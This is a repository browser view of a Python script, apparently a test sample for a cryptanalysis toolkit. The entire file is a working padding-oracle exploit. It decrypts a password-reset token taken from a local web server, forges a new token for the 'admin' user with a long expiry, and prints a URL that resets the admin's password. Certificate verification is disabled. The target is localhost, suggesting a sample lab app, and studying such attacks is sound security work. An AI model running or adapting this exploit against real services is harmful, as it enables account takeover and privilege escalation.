source: test/samples/password-reset/forge-password-reset.py

Last change on this file was 136, checked in by tim, 7 years ago

fixed escape codes

  • Property svn:executable set to *
File size: 2.8 KB
Line 
1#!/usr/bin/env python3
2
3import sys
4import time
5import json
6from bletchley import blobtools,buffertools
7from bletchley import chosenct
8from bletchley.CBC import *
9
10host = '127.0.0.1'
11port = 8888
12protocol = 'http'
13
14
15def fetchFreshToken():
16    gen_url = '%s://%s:%d/generate-reset-token?user=bob' % (protocol,host,port)
17    response = requests.get(gen_url)
18    return response.content.split(b'token=',1)[1].split(b'"')[0]
19
20
21def decode(token):
22    return blobtools.decodeChain(['percent/upper','base64/rfc3548'], token)
23
24
25def encode(binary):
26    return blobtools.encodeChain(['base64/rfc3548','percent/upper'], binary)
27
28
29try:
30    import requests
31    import urllib3
32    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
33except:
34    sys.stderr.write('ERROR: Could not import requests module.  Ensure it is installed.\n')
35    sys.stderr.write('       Under Debian, the package name is "python3-requests"\n.')
36    sys.stderr.write('       Alternatively, re-generate this script using the --native option.\n.')
37    sys.exit(1)
38
39
40session = requests.Session()
41def sendRequest(session, data=None):
42    data = data.decode('utf-8')
43    method = 'GET'
44    path = '/reset-password?token='+data
45    url = "%s://%s:%d%s" % (protocol,host,port,path)
46    body = (b'')
47
48    # Set verify=True if you want to validate the server cert
49    return session.request(method, url, headers={}, data=body, allow_redirects=False, verify=False)
50   
51
52def processResponse(data, iv=None):
53    global session
54    global poa
55    global ciphertext
56    global decrypting
57   
58    if decrypting:
59        length = len(ciphertext)-len(iv)-len(poa.decrypted)
60        #'\x1b[1;31m'  '\x1b[39;49m'
61       
62        if len(poa.decrypted) > 0:
63            d = repr(('?'*length)+poa.decrypted.decode('utf-8'))
64            d = d[0:length+1] + '\x1b[1;31m' +d[length+1:length+2] + '\x1b[0m' + d[length+2:]
65            print('\x1b[F '+d, file=sys.stderr)
66    response = sendRequest(session, encode(iv+data))
67
68    if b'Reset Token Corrupt!' in response.content:
69        return False
70    return True
71
72
73decrypting = True
74token = fetchFreshToken()
75print('Fetched new password reset token for bob: ' + token.decode('utf-8')+'\n',file=sys.stderr)
76ciphertext = decode(token)
77#print(processResponse(ciphertext), file=sys.stderr)
78
79# Padding Oracle Attacks
80poa = POA(processResponse, 16, ciphertext[16:], iv=ciphertext[0:16], threads=1)
81#print(poa.probe_padding()) # sanity check
82print('\x1b[F \''+poa.decrypt().decode('utf-8'))
83decrypting = False
84
85print('Now encrypting forged token...', file=sys.stderr)
86iv,ciphertext = poa.encrypt(json.dumps({'user':'admin','expires':int(time.time()+1000*24*60*60)}).encode('utf-8'))
87print("Use this URL to reset the admin's password:")
88print(' http://127.0.0.1:8888/reset-password?token='+encode(iv+ciphertext).decode('utf-8'))
Note: See TracBrowser for help on using the repository browser.